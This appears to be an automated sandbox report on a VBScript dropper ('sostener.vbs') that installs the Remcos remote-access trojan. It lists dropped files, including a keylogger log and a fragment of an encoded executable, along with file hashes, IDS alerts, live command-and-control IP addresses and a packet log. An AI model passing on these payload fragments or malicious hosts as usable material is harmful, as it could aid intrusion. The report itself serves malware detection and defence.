                                                                                                      https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/previewGet hashmaliciousUnknownBrowse
                                                                                                      • 52.217.196.57
                                                                                                      • 185.166.143.49

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\remcos\registros.dat

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):144
                                                                                                      Entropy (8bit):3.3603882199736725
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:rhlKlf4Plxl0cl5JWRal2Jl+7R0DAlBG45klovDl6v:6lfs0U5YcIeeDAlOWAv
                                                                                                      MD5:8C2C5E38697777DA00ED33223219180B
                                                                                                      SHA1:83623E67E4C65B281A9392676934BFCE05464F91
                                                                                                      SHA-256:7853E3096DC1D23741CAA914B9D14795217D78D907EC4F3658E5897E1472650E
                                                                                                      SHA-512:7CE74F8FFBD42BEE89F50F267039E2645368D0F823DE3CC78B3448BDBA3D9CDBE0C1F04809050C0C9B39562A9CC53F17C8D54F30A6F5826694A41A75BCF6F40E
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\registros.dat, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Preview:....[.2.0.2.4./.1.1./.2.0. .0.3.:.3.6.:.2.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json

                                                                                                      Download File
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):962
                                                                                                      Entropy (8bit):5.01360365253241
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tkluQ+nd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydbauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                      MD5:04B89191DF339BF9301F6DDC244CE66B
                                                                                                      SHA1:5E2663E97EFF9ED920A21A1DC6B30254052D5488
                                                                                                      SHA-256:423447CC5328815B686DE0A284415943D2168F2408BD2F76C067626FC2D6CA9F
                                                                                                      SHA-512:D6832DD9147DD08489B97591B35DAA6F127EFE20EDE2A802CF90D84A54F358604D5856C8ACC68B42D2AD2DBADDA2F834292888E865C8A7EA2E9464EED34C61E1
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11608
                                                                                                      Entropy (8bit):4.890472898059848
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                      MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                      SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                      SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                      SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1940658735648508
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Nlllul3+6l/Z:NllUO6l
                                                                                                      MD5:E948E261B93354B09C4E4FCE93DF4815
                                                                                                      SHA1:E17A8AEF5B768D2748A8B8ACA22A9627755022B8
                                                                                                      SHA-256:03E305403414534E20C77BA999CE52A2FB523D694AB04C9A0A36CD0782DBFA33
                                                                                                      SHA-512:D3673098B587D3E9133F4A7DDC83F2E854DB4CF4974F59A33D2FE025878DA28B14C0EB7E9E78638B602081F0D0B47368861334EDD36DDB0F444BF7CD1EA21E2F
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................&..............@..........

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qhn3up5.213.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czrpacwp.ndu.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enrupsoj.ymi.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhpgnei.lkn.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxryu1dp.nvd.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se0k430p.vcw.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\dll01.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106572
                                                                                                      Entropy (8bit):4.172614770017499
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:B9/ZyG8DTUx9iUs+rFguhnrwqlJI3o7lNi:zxyYiUs+rPEca
                                                                                                      MD5:4F4CC2BAF7A98AA5C29C3B21E48725CF
                                                                                                      SHA1:C25EBCB9B400D9FDAB1655E5666E986731397840
                                                                                                      SHA-256:1FE40914BF08072551BE2995FA32E2567B9B394D0DFDB18A9EA99CC9CF3AF001
                                                                                                      SHA-512:C46A7282C617E78922F2DBD64BBA2BA2161B54320ED04A81428F152D2DD64A001D15B7A18BC2EBA56579D5000D345B13D06C8E140E278F14BE36DFAA87DA5C8C
                                                                                                      Malicious:false
                                                                                                      Preview:TVqQ$$$$M$$$$$$$$E$$$$$$$$//8$$$$Lg$$$$$$$$$$$$$$$$$$Q$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$g$$$$$$$$$$4fug4$$t$$nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ$$$$$$$$$$$$$$$$$$BQRQ$$$$T$$ED$$HvVImc$$$$$$$$$$$$$$$$$$$$O$$$$Ii$$L$$V$$$$$$Ow$$$$$$$$G$$$$$$$$$$$$$$$$bgoB$$$$$$g$$$$$$$$$$$$$$$$$$$$$$$$E$$$$g$$$$$$$$$$g$$$$B$$$$$$$$$$$$$$$$$$$$G$$$$$$$$$$$$$$$$$$$$Bg$$Q$$$$$$g$$$$$$$$$$$$$$$$M$$YIU$$$$B$$$$$$B$$$$$$$$$$$$E$$$$$$E$$$$$$$$$$$$$$$$B$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$BgK$$QBT$$$$$$$$$$C$$B$$$$$$E$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$E$$B$$$$w$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$I$$$$$$C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$CC$$$$$$Eg$$$$$$$$$$$$$$$$$$$$$$$$$$$$C50ZXh0$$$$$$$$dOo$$$$$$$$g$$$$$$$$7$$$$$$$$$$I$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$C$$$$$$G$$ucnNyYw$$$$$$$$$$E$$$$$$$$I$$E$$$$$$Q$$$$$$Du$$$$$$$$

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:Unicode text, UTF-16, little-endian text, with very long lines (325), with CRLF line terminators
                                                                                                      Entropy (8bit):3.443268220851559
                                                                                                      TrID:
                                                                                                      • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                      • MP3 audio (1001/1) 33.33%
                                                                                                      File name:sostener.vbs
                                                                                                      File size:3'462'610 bytes
                                                                                                      MD5:619077e3c8387532a2d930e2b86c9ff7
                                                                                                      SHA1:081166adc2aed980d757c61687838f53ecaf4224
                                                                                                      SHA256:3c313c19ce509197f848990ef3837d2fdf55ed5d9eb2ddf2f1cd9f35e41bd664
                                                                                                      SHA512:cce42eacddd12c0a541eacb5a772b5a2b70844154c31264b82a846cda4db488d8142e3cb09caada11a16eceae16884577f439892b2c4465d04df9fffbcff3323
                                                                                                      SSDEEP:768:iooooLooooLooooLoooorooooLooooLooooLoooocooooLooooLooooLoooorooi:zDnM
                                                                                                      TLSH:EFF537039C51E00BD6A389A214D6F8F1659C77C6EC584CCE80C376D8E56E7F27B0AE99
                                                                                                      File Content Preview:..........'. .;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@.I.Q0;. ...C.;...5. .;.@.I.Q0;.;.@

                                                                                                      File Icon

                                                                                                      Icon Hash:68d69b8f86ab9a86

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-11-20T09:36:22.318836+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1152.217.196.57443192.168.2.749747TCP
                                                                                                      2024-11-20T09:36:22.318836+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2152.217.196.57443192.168.2.749747TCP
                                                                                                      2024-11-20T09:36:22.752887+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound152.217.196.57443192.168.2.749747TCP
                                                                                                      2024-11-20T09:36:22.752887+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)152.217.196.57443192.168.2.749747TCP
                                                                                                      2024-11-20T09:36:23.714286+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.749759190.9.223.1354576TCP
                                                                                                      2024-11-20T09:36:24.973348+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.749769178.237.33.5080TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Nov 20, 2024 09:36:10.142853022 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.147831917 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.147908926 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.150357008 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.155189991 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.858876944 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.858891964 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.858942032 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.858975887 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.858987093 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.859028101 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.859071016 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.859082937 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.859095097 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.859107018 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.859122992 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.859137058 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.859333038 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.859350920 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.859391928 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.866863012 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.866878033 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.866947889 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.987410069 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987441063 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987452030 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987513065 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.987598896 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987610102 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987648010 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.987773895 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987814903 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.987821102 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987832069 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.987869024 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.987926960 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.988426924 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.988449097 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.988461971 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.988482952 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.988497972 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.988579035 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.988590956 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.988629103 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.989126921 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.989192963 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.989202976 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.989243031 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.989352942 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.989363909 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.989403009 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.990103960 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.990114927 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.990127087 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.990154982 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.990180016 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.992399931 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.992409945 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.992420912 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.992523909 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:10.992542028 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:10.992579937 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.081913948 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.116182089 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.116203070 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.116218090 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.116239071 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.116241932 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.116254091 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.116261005 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.116326094 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.117563963 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.117580891 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.117595911 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.117643118 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.117645025 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.117659092 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.117682934 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118015051 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118066072 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118082047 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118105888 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118130922 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118185997 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118246078 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118294001 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118309021 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118323088 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118331909 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118355036 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118464947 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118511915 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118541956 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118582010 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118594885 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118609905 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118618011 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118644953 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118792057 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118805885 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118818998 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118834019 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.118841887 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.118868113 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119065046 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119079113 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119091988 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119106054 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119117022 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119153023 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119394064 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119451046 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119463921 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119502068 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119622946 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119637966 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119649887 CET804969991.202.233.169192.168.2.7
                                                                                                      Nov 20, 2024 09:36:11.119661093 CET4969980192.168.2.791.202.233.169
                                                                                                      Nov 20, 2024 09:36:11.119664907 CET804969991.202.233.169192.168.2.7
